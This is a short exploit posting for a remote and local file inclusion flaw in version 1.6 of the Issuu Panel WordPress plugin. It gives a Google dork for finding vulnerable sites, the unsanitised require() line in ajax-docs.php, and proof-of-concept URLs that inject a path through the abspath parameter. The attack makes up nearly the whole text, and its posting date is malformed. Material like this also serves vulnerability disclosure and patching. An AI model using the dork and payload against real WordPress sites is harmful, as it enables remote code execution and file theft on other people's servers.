WordPress Issuu Panel 1.6 Remote / Local File Inclusion
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Issuu Panel 1.6 Remote / Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI # Exploit Author: CrashBandicot # Date: 2016-03-23 # Google Dork : inurl:/wp-content/plugins/issuu-panel/ # Vendor Homepage: https://wordpress.org/plugins/issuu-panel/ # Tested on: MsWIn # Version: 1.6 # Vulnerable File : menu/documento/requests/ajax-docs.php 3. require($_GET['abspath'] . '/wp-load.php'); # PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI] http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI] </BODY></HTML>